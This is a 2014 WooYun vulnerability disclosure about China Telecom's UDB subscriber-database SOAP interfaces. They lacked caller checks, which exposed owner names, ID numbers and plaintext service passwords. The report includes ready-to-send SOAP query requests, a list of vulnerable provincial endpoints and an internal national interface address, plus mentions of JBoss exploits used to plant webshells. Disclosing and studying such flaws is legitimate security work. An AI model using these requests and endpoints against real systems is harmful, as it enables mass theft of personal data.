当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066838

漏洞标题:中国电信全国用户数据库接口配置不当允许任意查询(可查全国机主姓名、身份证、明文服务密码等信息)

相关厂商:中国电信

漏洞作者: hacker@sina.cn

提交时间:2014-07-01 12:22

修复时间:2014-08-15 12:24

公开时间:2014-08-15 12:24

漏洞类型:未授权访问/权限绕过

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-01: 细节已通知厂商并且等待厂商处理中
2014-07-06: 厂商已经确认,细节仅向厂商公开
2014-07-16: 细节向核心白帽子及相关领域专家公开
2014-07-26: 细节向普通白帽子公开
2014-08-05: 细节向实习白帽子公开
2014-08-15: 细节向公众公开

简要描述:

献礼七一,爱党爱国!

详细说明:

根据电信UDB规划发展说明,接口共分2套,即 “全国-/-省级”,UDB是实现中国电信统一账号的基础支撑平台。UDB系统将中国电信原有的各个独立的业务应用平台整合成一个庞大的服务平台,该平台以统一账号为中心对用户账号、密码进行集中维护和统一认证。
省级接口基于华为BME系统实施构建,因BME早期版本存在JBoss漏洞:
(CVE 2010-0738)
(CVE 2013-4810)
黑客可以利用漏洞EXP直接打击BME系统,上传网页木马。
通过对这套系统的分析调查,结合《中国电信用户数据库-接口与流程规范 v2.0》
http://wenku.baidu.com/view/b698f316f18583d0496459b3.html,我们可以得知其功能/逻辑为:

UDB向省UDB请求信息.png


UAM统一认证.png


这意味着本省UDB的BME系统只能查询本省机主用户信息,而全国UDB接口则可通过递归查询获取任意省份机主的用户信息。
对于安全保障方面,根据规范描述,应严格做好接口访问调用的限制,但事实上并非如此!

IP验证.png


正是缺失了对查询调用方的IP验证机制,直接导致任意用户都可以通过提交SOAP消息到查询接口,请求BME系统查询机主的帐户信息。
最近测试发现全国的BME系统都升级了,修补了JBOSS漏洞的问题,索性就把漏洞公布出来,希望加强重视,但不排除黑客还有其他通道获取该服务器的权限,或能够访问到全国UDB接口的处于电信核心区域的服务器权限。还是要加强边界防范,增强验证机制。
毕竟这套系统的功能并不仅限于查询信息,所有的用户业务开通、办理、缴续费等都依靠着该系统,一旦接口防范不严导致任意访问,兹事体大。

漏洞证明:

省级接口:
通过漏洞进入BME系统服务器后,获取管理员的帐号密码登录该系统,后台具有帐号查询的功能,可查询本省机主信息,并通过抓包分析,可以找到其直接调用的查询接口,该接口可外部任意用户访问,而无需登录BME或验证IP。

BME查询用户信息.jpg


省级接口查询示例.png


示例后台:
http://bj.passport.189.cn:8080/BME/frameset/login.action
示例接口:
http://bj.passport.189.cn:8080/BME/services/ // 提供的服务列表
http://bj.passport.189.cn:8080/BME/services/UDBCommonSoap
查询实例:

POST /BME/services/UDBCommonSoap HTTP/1.1
Host: bj.passport.189.cn:8080
Content-Type: text/xml; charset=utf-8
Content-Length: 518
SOAPAction: "http://bj.passport.189.cn:8080/AccountInfoQuery"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <AccountInfoQuery xmlns="http://bj.passport.189.cn:8080/">
	<srcSsDeviceNo>1000000000000001</srcSsDeviceNo>
	<querySsDeviceNo>1000000000000001</querySsDeviceNo>
	<userID>电话号码</userID>
	<queryInfoType>0</queryInfoType>
    </AccountInfoQuery>
  </soap:Body>
</soap:Envelope>


整理出存在匿名查询问题的省份UDB接口列表:
http://jl.passport.189.cn:8080/BME/services/UDBCommonSoap 吉林
http://ln.passport.189.cn:8080/BME/services/UDBCommonSoap 辽宁
http://hb.passport.189.cn:8080/BME/services/UDBCommonSoap 湖北
http://jx.passport.189.cn:18080/BME/services/UDBCommonSoap 江西
http://js.passport.189.cn:18080/BME/services/UDBCommonSoap 江苏
http://sd.passport.189.cn:8080/BME/services/UDBCommonSoap 山东
http://bj.passport.189.cn:8080/BME/services/UDBCommonSoap 北京
全国接口:
可以从任意省份BME系统中获取到全国-省级UDB查询接口,此接口服务器位于电信大内网中,无法从外部访问,任意省份BME服务器均可访问,如果有一个省沦陷,意味着黑客就可以掌控全国UDB的查询权限。

QQ20130613-9.png


.png


全国UDB接口内网地址(各省passport.189.cn服务器均可访问):
http://10.235.198.60:8810/UDBCommon/UDBCommon.asmx?WSDL
http://10.235.198.60:8810/UDBCommon/UDBCommon.asmx?op=RegisterQueryInfo
http://10.235.198.60:8810/ProvinceNational/ProvinceNational.asmx?WSDL
查询实例:

POST /UDBCommon/UDBCommon.asmx HTTP/1.1
Host: 10.235.198.60:8810
Content-Type: text/xml; charset=utf-8
Content-Length: 547
SOAPAction: "http://udb.chinatelecom.com/AccountInfoQuery"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <AccountInfoQueryRequest xmlns="http://udb.chinatelecom.com">
      <SrcSsDeviceNo>3500000000000001</SrcSsDeviceNo>
      <QuerySsDeviceNo>3500000000000001</QuerySsDeviceNo>
      <UserID>电话号码</UserID>
      <QueryInfoType>0</QueryInfoType>
    </AccountInfoQueryRequest>
  </soap:Body>
</soap:Envelope>


修复方案:

1.自己写的东西就应该按照其去实施,别不当回事,说得总比做的好
2.实时关注产品组件的漏洞披露及补丁发布情况

版权声明:转载请注明来源 hacker@sina.cn@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-06 10:51

厂商回复:

CNVD确认并在某个省份复现所述情况,其余省份已经同步转由分中心确认,已经转由CNCERT直接通报给中国电信集团公司处置。按信息泄露风险评分,rank 20

最新状态:

暂无

漏洞评价:

评论

  1. 2014-07-01 12:22 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    咔嚓!!

  2. 2014-07-01 12:24 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    大牛 教俺挖洞可好...

  3. 2014-07-01 12:24 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    卧槽

  4. 2014-07-01 12:28 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    叼炸天啊

  5. 2014-07-01 12:31 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

  6. 2014-07-01 12:37 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    前排,坐等中枪

  7. 2014-07-01 12:38 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    先跪拜一下!·

  8. 2014-07-01 12:39 | 晓海’ ( 路人 | Rank:1 漏洞数:3 | 一个IT界的酱油帝,坚信分享,创造未来!)

    全国?这规模也太大了吧?

  9. 2014-07-01 12:48 | Moc ( 路人 | Rank:23 漏洞数:12 | 屌丝何苦为难屌丝)

    怎一个屌字了的

  10. 2014-07-01 13:04 | 走火入魔 ( 路人 | Rank:18 漏洞数:2 | 多读书,多看报,少吃零食,多睡觉。)

    怎一个屌字了的

  11. 2014-07-01 13:08 | abcdlzy ( 实习白帽子 | Rank:79 漏洞数:14 | 好好学习,天天向上。)

    这是膝盖中了几箭的节奏么?

  12. 2014-07-01 13:11 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    还好我没手机

  13. 2014-07-01 13:20 | 小螺号 ( 实习白帽子 | Rank:56 漏洞数:9 | 小螺号呀嘀嘀的~~~~~~吹)

    我只挖到了一个省的 你厉害

  14. 2014-07-01 13:22 | he1renyagao ( 普通白帽子 | Rank:225 漏洞数:29 | 是金子总会发光,在还未发光之前,先打磨打...)

    神奇的路人甲

  15. 2014-07-01 13:22 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    碉堡了

  16. 2014-07-01 13:29 | MarkGUN ( 路人 | Rank:13 漏洞数:2 | 我是GONG,因为我喜欢一切美好的东西,但是...)

    牛逼了,路人甲威武

  17. 2014-07-01 13:30 | MarkGUN ( 路人 | Rank:13 漏洞数:2 | 我是GONG,因为我喜欢一切美好的东西,但是...)

    @小螺号 你挖到那个省的了,我也去挖下,避免我们不产生碰撞!

  18. 2014-07-01 13:33 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  19. 2014-07-01 14:06 | 0749orz ( 路人 | Rank:3 漏洞数:4 | 厌了,烦了~~~)

    牛B, 了,,别查我家水表。。。我拆 了

  20. 2014-07-01 14:32 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

    献礼七一,爱党爱国!

  21. 2014-07-01 15:01 | 芙兰朵露斯卡雷特 ( 路人 | Rank:4 漏洞数:4 | 看我闪现逃走闪现逃走六不六)

    卧槽!

  22. 2014-07-01 15:04 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:10 | 软件开发8年了,也来挖挖漏洞,为创建安全...)

  23. 2014-07-01 15:31 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    吓死我了。

  24. 2014-07-01 15:34 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    反正我木有用电信,哇卡卡卡~~

  25. 2014-07-01 16:55 | Master ( 路人 | Rank:29 漏洞数:10 )

    weiguan

  26. 2014-07-01 17:56 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    服务密码6个数字也明文……用的不是整型吧……

  27. 2014-07-01 20:53 | 爱Gail ( 普通白帽子 | Rank:237 漏洞数:38 | 爱漏洞、爱编程、爱旅游、爱Gail)

    这个比较强

  28. 2014-07-01 21:19 | Lucien ( 路人 | Rank:4 漏洞数:1 | 一个普通用户)

    我擦!

  29. 2014-07-01 21:26 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    打酱油的!

  30. 2014-07-02 11:04 | 兔兔侠 ( 路人 | Rank:2 漏洞数:1 )

    哇果断求看看

  31. 2014-07-02 15:50 | 飞鸡 ( 路人 | Rank:1 漏洞数:1 | 看,有飞鸡)

    我勒个去

  32. 2014-07-02 18:44 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    果断收藏

  33. 2014-07-06 18:47 | Ton7BrEak ( 普通白帽子 | Rank:211 漏洞数:43 | 吃苦耐劳,我只会第一个!)

    高rank~~等细节

  34. 2014-07-26 11:14 | PythonPig ( 普通白帽子 | Rank:491 漏洞数:71 | 只会简单工具的小小菜)

    神奇的路人甲

  35. 2014-07-29 10:11 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    你要想想这是华为去做的。不是我有意说他们,他们的开发有的很自大,觉得这个不是问题那个也不是问题,都不愿意改。

  36. 2014-08-15 04:39 | 汪哥 ( 路人 | Rank:28 漏洞数:6 )

    吓死了

  37. 2014-08-15 15:17 | 半夏 ( 路人 | Rank:12 漏洞数:3 | 新人一枚。。)

    哇擦 老NB啦

  38. 2014-08-15 15:40 | 迦南 ( 路人 | Rank:14 漏洞数:11 | 我不是玩黑,我就是认真)

    楼上+1

  39. 2014-08-15 16:13 | CoffeeSafe ( 普通白帽子 | Rank:142 漏洞数:37 )

    来我们中国电信上班吧~哈哈哈

  40. 2014-08-21 09:05 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............)

    好屌